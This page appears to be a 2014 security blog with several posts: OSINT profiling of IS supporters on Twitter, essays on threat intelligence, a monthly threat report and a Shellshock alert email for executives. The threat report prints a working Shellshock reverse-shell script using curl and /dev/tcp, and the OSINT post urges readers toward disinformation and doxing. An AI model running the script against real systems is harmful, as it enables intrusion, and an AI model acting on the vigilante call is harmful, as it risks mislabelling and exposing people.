Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Tweeter, Jihadi, Soldier, Spy: OSINT in the Twitter JIHAD

leave a comment »

snapshot43

 

IS and the Propaganda Wars

Since the time that Zarqawi created AQI and got UBL’s approval the latter day ISIL/IS/Daesh group was a rag tag crew of angry guys looking to blow shit up. Post Abu’s passing and with the rise of Abu Baqr, the ISIL/IS/Daesh group has grown not only in numbers but also savvy on messaging and recruiting. Of course some of this has to do with the shifting nature of the region given all the politics and US screw ups since the invasion in 2003 that allowed for the group to coalesce into what we have today running amok in the region. Once the group really gained traction though, and AQ even turned their back on them for being too brutal, the IS became a force to be reckoned with in the area but now they have spread onto the internet as a means of propaganda warfare and recruitment. Much to the United States chagrin they have been all too successful in propagating their message as well as giving fodder to the main stream media to roll out the fear machine and set it to eleven.

Twitter Jihad

f6d410a8-0af6-4139-94bd-93c9a1cf8627_16x9_600x338

Primarily the IS took the model that AQAP had started and learned what AQAP did not. IS is much more capable at propaganda and slick messaging than AQAP ever was. IS has even now started it’s own magazine “Dabiq” which is much like the Inspire magazine but seems to be much more art directed than Inspire was. Now the Daesh has even broken into full blown advertising with small propaganda films that film school students probably look at and swoon over for their slick nature and editing. These things though do not have as much reach without the Twitter Jihad that is going on in tandem and as their medium for dissemination.

Twitter has been the battle ground of late in the war of ideas between IS and the world. Of course the US has decided that either the accounts on Twitter should be banned (or maybe that is just Twitter making that decision?) but it seems that the net effect here is a great game of whack-a-mole while the world burns. The US has frankly been stymied to come up with a good solution to the problem of the propaganda that IS has been using to get the ummah to come to the jihad but recently they decided that trolling might be the answer they need.

turnaway

Of course what I would call trolling is not what I am seeing out of the Department of State’s account at all. I am seeing reasoned arguments that are aimed at unreasonable individuals or those who may have some mental issues that need addressing. By being logical and refuting the call to this particular type of jihad you are just going to maybe get a lock on the rational individuals. However, Daesh wants only the cream of the crop in the whacknuttery department to join their ranks or to self radicalize and act out their fantasies here in the West. Much like I would assume the attacker from yesterday in Canada did with his shootem up at the capitol.

Frankly, I have no solid answers on how to respond to all of this. I would love to see some plans in action that would stem the tide here and perhaps staunch the flow of propaganda and jihad on Twitter. So far the only thing I can come up with is what you will see below for those who are either interested in watching the great game at a larger scale or perhaps to get inside of it a little more and work towards some asymmetric solutions. Perhaps the likes of Anonymous and others would truly “Troll” these players and drive them to drink, spending more time wasting time setting up accounts than actually placing their crap online.

… Just a thought…

On the other end of the spectrum this will be a little primmer on perhaps how you might use some tools to get closer to these guys. By getting closer I mean more in the HUMINT side of the house because as we are seeing they are learning that their metadata is on the Twitter as well. A recent manual that came out from Daesh instructing the brothers on how to stamp out their metadata and specifically called out the fact that geotags had been a problem. Well, as you can see at the top of this post that yes, this is a problem for them. However, I would posit that unless you are watching them real time somewhere in the bowels of Twitter HQ the latency issue becomes a key factor in whether or not we can send a drone and a hell-fire up their asses.

metamanual

Clearly they are learning from their mistakes and it seems of late that the Bellingcat is out of the bag here with regard to things like looking near real time at their metadata through their posting of images and tweets from places like Raqqa and elsewhere. It was this manual that prompted the post you are reading now in fact. After looking at all the data and seeing the immensity of the accounts online now that are jihadi related I think that it’s just too much for the government to handle. For that matter I think it is certainly too much for the private companies to handle as well and once you come to that conclusion you then have to think about how well they don’t all talk to each other. In the end there is a morass out there and from all intents and purposes today from what I have seen the government has no idea what to do about it. There’s just too much noise to even get the signal and soft trolling is just pathetic.

Recon

So it comes to this, I have decided that the best way of creating some tension that might cause pain to the Daesh is to give you all a taste of recon and OSINT on the Daesh. There are many tools out there you can work with and certainly there are fools with tools out there but I would like to see some smarter approaches here. So here goes…

Some tools:

  • Recon-ng
  • Mentionmap
  • Maltego
  • twiangulate
  • twtrland
  • EXIF tools (online and off)
    • regex.info
    • Foca
    • A raft of other command line tools in live distro’s for forensics

It’s a toolbox really and you put the right tools in there that you like and do the job. I am sure you all out there have others you like. These are just a few of the ones I use daily for my fun and games. Lately though I have been leveraging Recon-ng for their twitter features and will be expanding even further into the youtubes and other modules that they have for this kind of work. Suffice to say that you can really profile people on Twitter for example with just this tool alone. Below are some of my outputs for you to see.

snapshot12Supporter in Raqqa tweeting 10.17.2014Recon-ng of user on Twitter who is a player within Daesh and is in Syria

snapshot16Another user logging their connections including their DM connections

AbuAdamAlAmrikiA map of a user and who they talk to/mention with frequency as well as hash tags

snapshot41Supporter in Raqqa tweeting 10.17.2014

 

All of this data is pretty easy to get once you have the right tool sets and a good place to start looking. I leveraged a couple of accounts that I knew of (Adam Gadhan and Juni Al Britani) but you can use others. I will say though once you start spidering ou you will see a flood of accounts out there that are like minded. The trick though is to locate all those users in country and who are real players in the Daesh palooza and this is where you have the analysis phase of the game. As I have said in my posts about Threat Intelligence, it’s all about the analysis and product. If you don’t carry out the analysis well it all means nothing.

PS.. if you don’t know the tools go learn. I am not here to teach you how to use them. Buy the ticket… Take the ride.

Analysis

Analysis of the data here is the part of the cycle that takes a human being. Someone who can make connections as well as verify them. Tools are great but there are many fools with tools out there as I said above so if you use the tool but you fail in the analysis then you will give bad data in the form of connections that are incorrect. In the case of the Twitter jihad you have to have some idea of who you are dealing with. Are you in fact dealing with a real player who is in Raqqa or Ramadi or are you dealing with a wannabe in the US? You have to actually look at all the traffic, understand the language, and the psyche to make any real headway here. Just grabbing user names won’t do and it certainly won’t do if you cannot even Google translate a bit of the language to even have an idea of what is going on.

By analysis of the connections and reading the tweets you can then react appropriately by:

  1. Passively collecting intelligence
  2. Actively collecting intelligence
  3. Actively degrading their activities through disinformation operations
  4. Actively reporting their activities to authorities (thus degrading their capacities through blocks)

I am advocating all of these things now because this is just Twitter. This stuff is public to begin with and as such it is not like they are planning operational details through Twitter. They are instead advertising really and that to me is up for grabs for the common folk on the internet to attack. I am sure some out there will have a hissy about all of this (Flashpoint, lookin at you Evan you dickweed) but I don’t give a crap. This stuff is just polluting the weak minded and any way to stop it in my book is sauce for the gander.

If you are going to do this then you had best learn OSINT and intelligence analysis. If you want to just scrape names and pass them to Twitter to block, fine, but at least give them the real players and not some hapless reporter ok? Do the work, learn the tools and make a difference.

Asymmetric Response

So what I say to you all out there is pick your plan and go with it. Give the daesh a pain in the ass. I know that in the past Anon’s have been threatening all out war on the jihadi’s on Twitter and I have seen a bunch of nothing come of it. Doxing these guys will only work if they are in the US or another country where they can be picked up.I do fully support the idea though that if you are going to do this then you report them to the authorities. Drop the FBI a dump of accts and maybe some of these guys /girls can get picked up before they pull a stunt like we have seen with be-headings to mass shootings.

The governments trolling is not working and it seems that more and more of these accounts keep popping up. I mean hell, Juni’s on his 103’rd acct right?

Derp.

Just do a good job.. No half ass attempts.. And remember.. I am watching you Daeshbags!

K.

Written by Krypt3ia

2014/10/23 at 13:24

The Threat Intelligence Cycle and YOU

with 2 comments

Screenshot from 2014-10-13 09:51:41

The Cost Benefit Analysis of Threat Intelligence:

Over the weekend I got a call from @packetknife who began to question me on some of the finer points on the threat intelligence post I put up recently. The primary thing of it all kind of boiled down to “So what’s the cost benefit analysis here” which was not meant in money but really in overall efficacy. What real good would come from having a threat intelligence capability that really could be more broadly expanded to such things as competitive intelligence and the like.

It was a good question and it is something that I had talked about before in my BsidesLV presentation on this subject. To cut to the chase here the point is that if you create a capacity and you generate intelligence from analysis of the “data” being given to you as well as what you are seeing in your own logs, then you have analysis and information that can be used to inform management. Management may not be really aware of these things and they should by all rights be in today’s age of the weekly compromise announcements. Business decisions are made every day concerning the security of a company and all too often as we have seen lately those decisions may not have been the best for the security of the companies found to be compromised and losing data. A for instance would be Home Depot using SEP 11 as their primary means of protection against malware or, even at a lower scale, the use of MalwareBytes by the heating and cooling company that was the launch point for the attack on Target.

There is a cost benefit to having your own program of looking at the data as well as the so called intelligence you can get from a portal and that benefit lies in not only technical means (i.e. blocks in firewalls and sigs in SIEM’s) but also awareness on the part of the org and it’s leaders as to what is happening in the world and how that may effect your organization. Of course your leaders have to be available to this kind of thing and they have to have it spoon fed most of the time but if you get those things squared away you will make your life a little easier in trying to defend the organization as they might have some clue as to why you are warning about something.

Rubber Meeting Road:

Some *cough Ali cough* might question whether or not this is something that anyone other than a government or perhaps a defense base corporation would care about. I agree, it may be a tough sell at times but I have no doubt that there is a benefit to some form of this program being in any corporation that has a security presence. I am not saying you need to get more bodies and form a group solely dedicated to this function (though that would be nice) but instead are saying that the function at least has to exist in some working fashion to make your security program work as a whole. Without these insights you are pretty much going to be only reactive and not proactive and this is bad.

If you really look at this you are not just reporting on what is going on in the world but also enlightening your management about your environment as well. If you say run a scan on your network and locate five NT machines that run rather important functions within your business you should generate intelligence that your network is at risk from NT being there as an outdated and unpatched system. Additionally you would be able to add context through analysis that those very important systems, were they to fall down and go boom or be hacked. could cause major issues for the company. Now, do you get that in vuln scans? Yes, you do. However, I would ask whether or not those scans ever make it to management in the first place? Secondly, do they actually have analysis as to WHY this is a rather important issue?

See where I am going here? The scan is DATA but the analysis is INTELLIGENCE…

Adding more analysis by marrying what you have that is vulnerable in your environment as well as analysis as to why it is there now and what the potential problems are in it remaining so as well as current attacks out there that may be going after such things is “Threat Intelligence” Am I making any sense here to you? Threat Intelligence (now TI in the vernacular as I see in my Twitter feed) is the sum total of all your scans, your feeds, and your intelligence gathering internally and externally to inform your business. It is up to them after you have informed them to accept the vulnerabilities after they comprehend them. That comprehension delivery is what you are doing in the form of TI.

Whether or not companies and management guys will buy into it is really the key part of the problem. I personally found that I had to take a page out of Jayson Street’s book and just did it. I created reports and I sent them to the management. Once they got the spoon fed fifth grade reading level informatics of what was going on the light-bulb got turned on. Does this mean that they react on larger issues that should be taken care of? No, it doesn’t. However, I have informed them and keep them up to date on what their overall security posture is like and that at the end of the day is all I can ask. It is after all their business. I only inform…

Your mileage may very.

K.

Written by Krypt3ia

2014/10/13 at 15:40

The Threat Intelligence Cycle

with one comment

sis_lifestyle

 

Nomenclature:

Lately I have been seeing more people coming to the realization that all of this threat intelligence for sale out there from vendors may or may not be what they claim it is. I for one have been thinking that much of what is out there today is either of poor quality or mostly not relevant to the users who are buying the data. It’s that last sentence though that most of the time I try to get across to people through this blog and elsewhere. To wit, most of the time what you are being offered by these threat intelligence firms is data, not necessarily intelligence and this is a nomenclature issue that I think is important.

Intelligence by the very definition is this;

Screenshot from 2014-10-02 14:51:57Meanwhile intelligence requires analysis to make sense of all that data:

Screenshot from 2014-10-02 14:54:05http://en.wikipedia.org/wiki/Intelligence_analysis

Often what you get from an intelligence portal is data and analysis of actors that you may never have to deal with and who are not targeting you. Data that comes from honeypots and perhaps incidents from other clients but those clients and that data may not be in your vertical as well so what bearing do they have on you? Another question to ask at this time is whether or not the intelligence analysis was carried out by a trained intelligence analyst or not. Often times today we see intelligence output that is flawed due to poor data and or suppositions made from bad attribution and other factors. So really how much can you trust that intelligence report to start with and secondly does that information even have relevance to your organization or network infrastructure?

Once again the militarization of the internet and the information security field has led us astray with nomenclature that sounds cool but may not really fit the needs of INFOSEC outside of a military or government sphere of influence. So now that you have some idea of the nomenclature issues around all of this I would like to take up the notion that what most of you now get from so called threat intelligence outfits is really just data and not so much intelligence.

Data Versus Intelligence:

When you buy into a threat intel feed you most of the time get emails with data. Command and control IP’s, malware hashes, and things like that. You may have a portal where you can look up specific actors (Crowdstrike for example) and get a sense of who they may be and how they operate but really, do most of you out there really digest that data and use it to inform your management or the direction of your security program? On average I would say that the bulk of what companies do today is take C&C data or bad actor data and then place that into their own IDS or firewall rules to attempt to stop those types of attacks. This is not intelligence consumption, this is data consumption.

A yara rule or other TTP data is just that, data. You could very well throw away the rest of the report (which I assume many do) and just move on. Intelligence has consumers and that intelligence has to be created for that consumer. If you are a financial institution and your threat intelligence feed does not cover crimeware that steals credit card data how much good is it to you? Don’t get me wrong, having that data to put into your IDS/Firewall as a proactive prophylaxis is great. Yet still it is not intelligence. Thus I say again most of what you guys are buying is not true intelligence unless you get a tailored report for your company that covers data from your environment as well as information about actors who would wish to or have attacked it. This direct information would help the management and the staff make decisions on the direction of security and the overall threats to the environment that need to be addressed.

Good Intelligence Versus Bad Intelligence:

Next I would like to tackle the idea of when intelligence is bad and when it’s good. Intelligence analysis is never easy and it is never one hundred percent accurate. A simple example of this idea would be the conversation between former CIA director George Tenet and former President G.W. Bush regarding Saddam’s WMD’s.

“George, how confident are you?” the president asked Tenet, in an exchange depicted in Bob Woodward’s book “Plan of Attack.”

“Don’t worry, it’s a slam-dunk,” Tenet said.

Well, there were no WMD’s and the intelligence came from the WHIG (White House Iraq Group) which was run by and lorded over by Vice President Dick Cheney. Intelligence can be misguided or it can be deliberately led astray to be used to influence decision makers and it is the same with threat intelligence in the Infosec world. Within this blog post though we are talking about intelligence on actors who may only be known from very small bits of data in code or IP addresses that were used in the attacks. This attributional data is what many of the threat intelligence firms hang their hats on and the reality of it all is that IP attribution is highly dubious given the nature of the internet to start. There are no slam dunks here no matter what a provider may tell you about a specific actor that they have been watching.

So when you buy into a program for intelligence you have to look at it from the following perspectives;

  1. Does the threat intelligence firm have a feed from your systems? (i.e. log correlation)
  2. Do they know your business?
  3. Do they know how you operate day to day technically?
  4. Do they cover more than just APT actors? (i.e. teh sexy)
  5. Do they give you a report every month on actors that specifically would be interested in your business?
  6. Do they give you a report that is tailored to your environment with your vulnerabilities?

If your threat intelligence vendor does not give these things to you then I would say that you are not getting “Threat Intelligence” at least none that you could use really. What you may be getting in fact is “data” that you can use as a tactical tool to be proactive and block certain attacks and maybe some actors. Mostly what I want to say to you is that I have a little aphorism that I love and it is this;

“A fool with a tool is still a fool”

There are many tools out there that call themselves threat intelligence firms and there are many fools out there who gladly use those tools without any real effect in securing their environments. I am planning on a post later on about the issues around intelligence gathering and analysis. This is a large topic and I think it best be something stand alone for you all to look at. I just wanted to give you all the main idea here that what you are all buying isn’t really intelligence.

“Caveat Emptor” people.

The Intelligence Cycle:

Let’s talk about the intelligence cycle for a bit now that we have gone over some of the misapprehensions out there today over threat intelligence. You the consumer of this information should have a goal or benefit in mind for paying for this service right? Well unless you have a team that can digest the information or alternatively a vendor who creates reports that execs can read and understand on the threats out there for their companies you will find that it all just means Greek to you. So to understand all of this better you need to understand the intelligence cycle itself.

Below are the precepts of intelligence as a cyclical practice to first understand the problems you have, then collect data, analyse it, and then report on the threats.

  • Setting Objectives
  • Information Collection
  • Data Analysis
  • Analysis and Reporting
  • Threat Assessment (aka) A Threat Intelligence Assessment

sis_lifestyle

Can you in fact count on your vendor to be using this cycle to identify the threats to you? I find that usually this is not what they do as I said above. This means that you and your org have to create your own team or buy into a vendor who will do all of these things for you. Without this all of the data being thrown at you is just data without real context and that certainly would be the case without people in your environment making sense of the data and responding to it appropriately for your organization.

Next Generation Threat Intelligence:

Well, I have explained the nature of intelligence and the cycle as well as touched on what bad intelligence is as well as just plain old data. Now though I would like to cover the idea of what I see as the next generation of threat intelligence. As I said above, unless a firm is selling the full package and has a lot of insight into your business and infrastructure you need to create your own intelligence function inside your Information Security infrastructure.

What this really means is that you will have to get some people and some resources to collect the data on your environment and what you are seeing. You will then be able to perhaps augment this with feeds from outside vendors and use it all to synthesize an analysis that is tailored to your org. Once you do this and you have a functioning intelligence organ you can be proactive to threats that are seen in the wild as well as those that you are seeing coming directly at you.

Carry out the following functions:

  •  In House Data Collection
  • Augmentation With Outside Data and Intelligence Analysis
  • True Threat Intelligence Using YOUR Data and Shared Resources
  • Identifying Threats To YOUR Environment
  • Reporting

In some cases such as some large banks (BofA) have their own intelligence wings that purportedly not only take feeds from the Crowdstrikes of the world but also use other OSINT techniques. These groups also use human assets and behavioural modelling to generate reports of threats out in the real world that may directly affect them. This is another level of intelligence gathering that you may also want to take up later on. First though, if you are going to say you are using threat intelligence then you had better have one of the two scenarios above. Otherwise you are not using threat intelligence at all. You are just floundering in a sea of data that may or may not pertain to you at all.

My recommendation to you all is that you consider setting up a group that does this. If you have feeds then have people in that portal looking at all of the data that they have. Look at how actors operate and who they target. Perhaps there are things you can intuit from their reports. However, the big goal here is to work with YOUR environment. The phrase “Know Thyself” comes to mind here and it would be a true statement on what you should be working towards in threat intelligence.

 Conclusion:

Well there you have it. I have had this running around my mind for a while now and lacked the motivation to post until today. I hope this is helpful to some of you and I am sure there are some people out there who may take issue with some of what I said (mostly vendors I am assuming) but it had to be said. While it all may sound sexy and full of intrigue there is also a lot of snake oil as well. Unless you understand the goals of what you are buying into you just end up wasting your time and money.

Frankly I have seen so many orgs out there who lack even the capacity to have effective security awareness programs so I have little hope that any of them would be able to cobble together a real intelligence function. All too many places just want the check box of “YUP! I HAVE A THREAT INTELLIGENCE FEED! I AM SOOPER COOL” and it saddens me. Ok, no, wait.. It really enrages me most of the time as many of you may already see in my Twitter feed daily. I guess maybe that’s all well and good for them but for me this is just wasting time and money. If you want to protect your org then you should be doing things that make more sense than buying bad intel and a yara feed.

Don’t even get me started on all the vendor’s super cute names for all their actors and how they don’t share intel with each other. That will only make me even more rage filled I am sure. Of late I have been told I need to start a service to teach the intelligence cycle and all of the things that pertain to running a good program. It is something I am considering but there has to be a desire out there. On average I am not seeing too  many orgs outside of the big defense base types who care enough to do it right. Don’t get me wrong though, I don’t think this has to be a big spend either. In fact I think many places could just drop their very expensive threat intelligence feeds and buy an IDS, set up a team, and do all this work more effectively themselves.

*heresy huh?*

Think about it. More later on the pitfalls of intelligence analysis and cognitive bias.

K.

Written by Krypt3ia

2014/10/02 at 20:14

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

leave a comment »

photo

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

EXECUTIVE SUMMARY

During the month of September 2014 there were a number of incidents reported as well as stories of malware and crimeware. However, none of them compares in scope and threat to the bash bug that was released for all UNIX and Linux systems on the internet. The “Shellshock” bash vulnerability was released Wednesday 9/24/2014 and within a short time the internet was abuzz with alerts that all *NIX systems were vulnerable to this.

The bash bug is a real and present danger to systems that may misconfigured as well as those with the proper security features enabled. This is due to the fact that once the bug is exploited the attacker may then use other code to exploit the system further and thus compromise that machine. A further discussion of this bug and its import can be found below.

In other areas the global threat level is at a constant but with this new bash vulnerability and the issues surrounding it’s remediation the THREATCON LEVEL for this month post release of the Shellshock bug is at HIGH.

GLOBAL THREATS

SHELLSHOCK:

Shellshock: at its heart is a bug within the parser of the bash shell. The “bash” shell is the most common “command processor” in the UNIX and Linux systems we have today. The bug comes from the parser not stopping its function at the point where the command has been carried out but continues on and allows for arbitrary code to be run.

CVE-2014-6271: This is the original “Shellshock” Bash bug. When most people refer to the Bash bug or “Shellshock”, they are most likely talking about this CVE.

CVE-2014-7169: This is the CVE assigned to the incomplete patch for the original bug.

The original patch was found to be incomplete shortly after the vulnerability was publicly disclosed. A variation on the original malicious syntax may allow an attacker to perform unauthorized actions including writing to arbitrary files.

CVE-2014-7186 & CVE-2014-7187: These two CVEs are for bugs discovered in relation to the original Bash bug. These two bugs are triggered by syntax that is very similar to the original Bash bug, but instead of command injection, they allow for out of bounds memory access. There is currently no proof that these bugs have remote vectors and they have not been seen in the wild.

CVE-2014-6277 & CVE-2014-6278: Security researchers discovered two additional bugs. These two bugs are supposed to have the potential for arbitrary command injection, similar to the original Bash bug. However details have not been made public yet, in order to allow appropriate patches to be created.

ANALYSIS:

The primary issues around this vulnerability is simply this;

The bug could allow for code to be run on systems connected to the internet by anyone who can access them with and simply run code against them. This means all websites that run CGI/HTTP etc that run on UNIX/LINUX as well as any appliance (routers and other types) that have a web based or shell interface that can be accessed to pass the code to.

What this means is that no matter if you have the system locked down it may be possible, if the interface is available, to run 0day code or common commands that may cause the system to respond in ways that it was not meant to. An example of this that may impress the danger upon you is that with the right code, on a vulnerable system, one can create a reverse connection (AKA s shell session) to from your machine to the attacker with some very simple code.

Example Code:

#!/bin/bash

echo little shellshock CVE-2014-6271 cgi-bin reverse shell script by @jroliva

# step 1.- #nc -lp 8080 -vvv

# step 2.-  #./little-shellshock-reverse.sh localhostIP attackhostIP

/usr/bin/curl -A “() { foo;};echo;/bin/bash -i > /dev/tcp/$1/8080 0<&1 2>&1″ http ://$2/cgi-bin/test.cgi

Once this code has been run you will have a connection to that machine to further exploit it remotely at your leisure. Additionally due to the nature of the bug and the variability of the code that could be exploited here we are still unsure of just where the boundaries are on attacks using this vulnerability.

Patching the systems with vendor patches is the primary fix to this and to date more patches are being released every day from large and small vendors to fix the parser and to stop the bug. However, you have to be vigilant and seek out all your systems within your environments that may have bash as their shell and insure that they can be patched. In some cases these systems may not have any code to be used to patch because they are out of date and the companies may not even exist any more.

This bug has already been seen used in the wild by APT actors as well as there are now malware versions out there using the bug to seek out and exploit machines automatically. It is recommended that if you have not begun attempts to assess all of your assets both internally and externally that you should do so as soon as possible. This exploit can now be detected by IDS systems signatures but unless they are blocked at the network level by an IPS you may be compromised and not be aware of it already.

Links:

http://www.tchnologyreview.com/view/531286/why-the-shellshock-bug-is-worse-than-heartbleed/

http://www.washingtonpost.com/blogs/the-switch/wp/2014/09/29/the-internet-is-still-shellshocked-by-latest-bug-but-it-wont-be-the-last/

http://www.wired.com/2014/09/shellshocked-bash/

Incidents:

Supervalu Reports Second Hacking Incident:

Supervalu, a grocery chain, has reported a second compromise to it’s payment systems this September. The first was reported on in August and now the second seems to be unrelated to the first incident and group.

These attacks both targeted the POS (Point Of Sale) systems within the stores and the net loss of credit cards according to Supervalu and authorities have yet to be released at this time.

ANALYSIS:

POS systems are notorious for being insecure. The reasons for this stem from not only the fact that the systems often need to be installed on computers with outdated Windows Xp on them but also in that they do not encrypt the data on the fly.

RAM scrapers are simple pieces of malware that sit in the memory of the POS system and just copy the data that is swiped in by the consumer at the terminal. This vulnerability is not new and has been leveraged by the carders who have been carrying out these attacks. These attacks will continue until such time as the POS terminals are secured at the application level and or the more secure “Chip and Pin” systems are implemented in the US as they already have been in the EU.

Links:

http://online.wsj.com/articles/customers-data-may-have-been-hacked-at-albertsons-acme-stores-1412027253

http://www.cbsnews.com/news/new-hack-attack-at-albertsons-supervalu-stores/

http://www.wired.com/2014/09/ram-scrapers-how-they-work/

“The Fappening”: (Celebrity Nudes Hacked from iCloud)

In August the release of nude photographs of famous women caused a sensation on line and in the news media. The photos and videos were all stolen from the Apple iCloud service that all iPhones and iPads use. The FBI has begun an investigation into the hacking incident that caused this and into the attackers who not only hacked into the iCloud but also released the photos online as a breach of privacy.

ANALYSIS:

The “Fappening” as the incident was named on Reddit and other sites within the DarkNet shows just how vulnerable we all are to compromising situations where technology is concerned. It is assumed by us all at some point that the data (i.e. photos and videos) are safe in the cloud storage that we upload to because companies like Apple are doing their due diligence in protecting that content. However, this incident shows that that may not always be the case and that your private and personal intimates may be open to anyone who can brute force a password.

The same analogy can be made for any cloud stored data that a company may be placing for safe keeping. It is important to consider the privacy and security aspects of all data a company or an individual may create and or allow you to hold for them. As such any company doing business holding or letting data be held should take pains to insure the due diligence on privacy and security. The Fappening is a cautionary tale where this all went wrong.

http://www.nytimes.com/2014/09/03/technology/trove-of-nude-photos-sparks-debate-over-online-behavior.html?_r=0

http://www.independent.co.uk/life-style/gadgets-and-tech/news/the-fappening-after-the-third-wave-of-leaked-celebrity-photos-why-cant-we-stop-it-9763528.html

CRIMEWARE AND MALWARE

FBI Opens Malware Investigator Portal to Industry:

The FBI has opened their malware analysis portal online for sharing with private industry. This site will be another in many types of information sharing that the government and private entities will be creating to help in the fight against malware and criminal activities. This portal will have malware samples, data on attacks and signatures to use in determining the attacks and the attacker characteristics.

The portal will also have a feature like malwr.com and cuckoo where you can upload a suspected file to it and allow a session to determine whether or not it is malware and just what it does after it infects a system.

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/

ANALYSIS:

The analysis of malware is an important feature in today’s information security program. Reliance only on technologies like AntiVirus is hubris and should be augmented with analysts who can test suspect files and links to insure whether or not they are a threat to the environment.

Often times AV products are on the back end of the curve where malware is concerned today and such tools like Cuckoo and Malwr.com are integral to a functioning IR (Incident Response) program at any company. That the FBI is allowing the use of this also adds value to the FBI in that they are getting live intelligence on potentially unseen malware from their user base.

Home Depot Reportedly Hit by New Malware In Recent Hack:

Home Depot reported in August that they had been hacked and their POS (Point Of Sale) systems were targeted. The hack was ongoing undetected for about 5 months and in that time the carders made away with approximately 56 million credit card numbers and attendant data.

On September 14th though the Unites States Secret Service reported that the malware that was used in this attack was a new variant never seen before. They named the malware “Mozart” However, others are claiming that the malware is in fact the same BlackPOS malware that was used in the Target hack that also stole large amounts of credit cards from their stores last year.

ANALYSIS:

The malware used in the attack on Home Depot is definitely linked to the Lampeduza collective who carried out the attack and sales of the Target data. Within the strings of the code for the mlware there are direct connections to the Lampeduza crew up to and including references to Libya and Ukraine and American meddling in such regions.

This sentiment is echoed in the sites that are affiliated with the Lampeduza group as well as a penchant for Libya and the late Muammar Khaddafi. Another factor here is that the malware fundamentally functioned identically to the BlackPOS malware usedf on Target.

http://online.wsj.com/articles/home-depot-was-hacked-by-previously-unseen-mozart-malware-1411605219

http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/

APT ACTIVITIES

Chinese Target Hong Kong Protesters iPhones with Malware:

Malware has been discovered affecting the protesters in Hong Kong that began protesting this week. This is a very targeted and rapid attack to attempt to control the protesters and perhaps arrest those who may be sympathetic to their cause.

ANALYSIS:

The malware dubbed “Xsser RAT” was installed by China on the protesters phones and is different than most because it not only affects Android phones but also iOS (Apple) phones as well but at this time no wild version that works has been seen. This cross platform malware has the ability, once installed on the phone, to see and capture everything that the user does on the phone.

Code within the malware has shown that it contains Chinese characters and reports back to a command and control that is under Chinese control. This is just another escalation in an ongoing battle over protests concerning a more free Hong Kong, something China does not necessarily want.

This incident serves as a parable on how advanced persistent threats can use weaponized code that they have already in their control to rapidly deploy and use against those they would wish to attack.

http://www.nbcnews.com/storyline/hong-kong-protests/hong-kong-protesters-phones-targeted-chinese-malware-experts-say-n215396

Putting TRANSCOM in Perspective

Today, the Senate Armed Services Committee released information indicating that China-based threat actors were heavily targeting TRANSCOM, the U.S. military’s logistics arm. In terms of the private sector contractors impacted, the intrusions detailed in the Levin report mirror activity FireEye has observed: we frequently see nation state threat actors target not only government, but also private sector organizations in order to obtain military intelligence.

ANALYSIS:

Fireeye put out a blog post after the US DOD put out a report on attacks that were carried out by APT actors against defense base companies. This is not necessarily news but the fact remains that not only the defense base has been a target of late of nation state actors.

While APT (Advanced Persistent Threats) are prevalent it is important to know that they are targeting anything and everything that may be of interest to them. This means now that public systems as well as corporations are now potential targets. As such, it is important that all companies take the time to understand what all of this means, how these actors carry out their attacks, and how one can protect against these attacks.

http://www.fireeye.com/blog/technical/2014/09/putting-transcom-in-perspective.html

I have also created a word format of this document with a section where you can put in your own metrics. Use this document to give your executives a threat intelligence report and hopefully enlighten them on what is going on out there.

LINK TO WORD FORMAT OF THIS DOCUMENT: HERE

Written by Krypt3ia

2014/10/01 at 20:28

Posted in Uncategorized

SHELLSHOCK!

leave a comment »

758f00996e876b8d3dd7db3b3543426d

Hey kids!

I just thought I would drop this stock email for you all to use to splain to your execs the problem of SHELLSHOCK and that it is IMPORTANT! I tried to wordsmith for the exec set in here and the links go right to pertinent blog posts and the CVE from NIST. Just a heads up I just saw that F5 BIG-IP is also in fact vulnerable to this attack so WHEEEEE!

Smoke em if you got em…

K.

UPDATE: Looks like SUID attack may be possible too…

Screenshot from 2014-09-25 08:09:17

Email Text:

All,

There’s a new vulnerability that affects nearly every system out there using BASH shell on the internet. This means that any Linux/UNIX system that is at the moment, internet facing is potentially vulnerable to being exploited by someone using commands inserted and sent to servers via CGI scripting or html for example. There is already a module in metasploit on this but you can check your versioning and if it is vulnerable with the following command in bash shell. This is an important vulnerability that could lead to larger compromise of our environment!

The short answer here about this vuln is that if you are vulnerable an attacker can use random code to have your system spit out data that you don’t want available such as etc password files etc.

Needless to say this is of a HIGH importance and rates a 10 on the NIST scale!

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-6271

https://t.co/RprJoBGl7s

http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html?m=1

How to test for this vulnerability:

env X=”() { :;} ; echo busted” /bin/sh -c “echo stuff”

If you get “busted“ back you are in fact vulnerable.

 

REMEDIATIONS:

https://access.redhat.com/solutions/1207723 Red Hat recommendations

There’s a new vulnerability that affects nearly every system out there using BASH shell on the internet. This means that any Linux/UNIX system that is at the moment, internet facing is potentially vulnerable to being exploited by someone using commands inserted and sent to servers via CGI scripting. There is already a module in metasploit on this but you can check your versioning and if it is vulnerable with the following command in bash shell. ~Troy Hunt

Another concern here is this.. Other appliances that are at risk;

The bigger worry is the devices with no easy patching path, for example your router. Short of checking in with the manufacturer’s website for updated firmware, this is going to be a really hard nut to crack. Often routers provided by ISPs are locked down so that consumers aren’t randomly changing either config or firmware and there’s not always a remote upgrade path they can trigger either. Combine that with the massive array of devices and ages that are out there and this could be particularly tricky. Of course it’s also not the sort of thing your average consumer is going to be comfortable doing themselves either. ~Troy Hunt

Another option is to remove BASH and replace it with something else;

“Other more drastic options include replacing Bash with an alternate shell implementation or cordoning off at-risk systems, both of which could have far-reaching ramifications and are unlikely to be decisions taken lightly. But that’s probably going to be the nature of this bug for many people – hard decisions that could have tangible business impact in order to avoid potentially much more significant ramifications.” ~Troy Hunt

 

DETECTION OF COMPROMISE:

Basically there is no means to do so effectively unless perhaps you are capturing all packets…

This can be hard to determine if there’s no logging of the attack vectors (there often won’t be if it’s passed by HTTP request header or POST body), but it’s more likely to be caught than with Heartbleed when short of full on pcaps, the heartbeat payloads would not normally have been logged anywhere. ~Troy Hunt

The real problem here is that this exploit set is still being worked out because it’s kinda modular. What I mean is that if you can get random code to work then you can place exploit code in there and get 0day to complete the job. So this is an evolving threat and MUST be taken seriously. Mitigation strategies should be worked out in the environment and all due diligence should be followed on keeping up with the intelligence on this vulnerability and what is being seen in the wild.

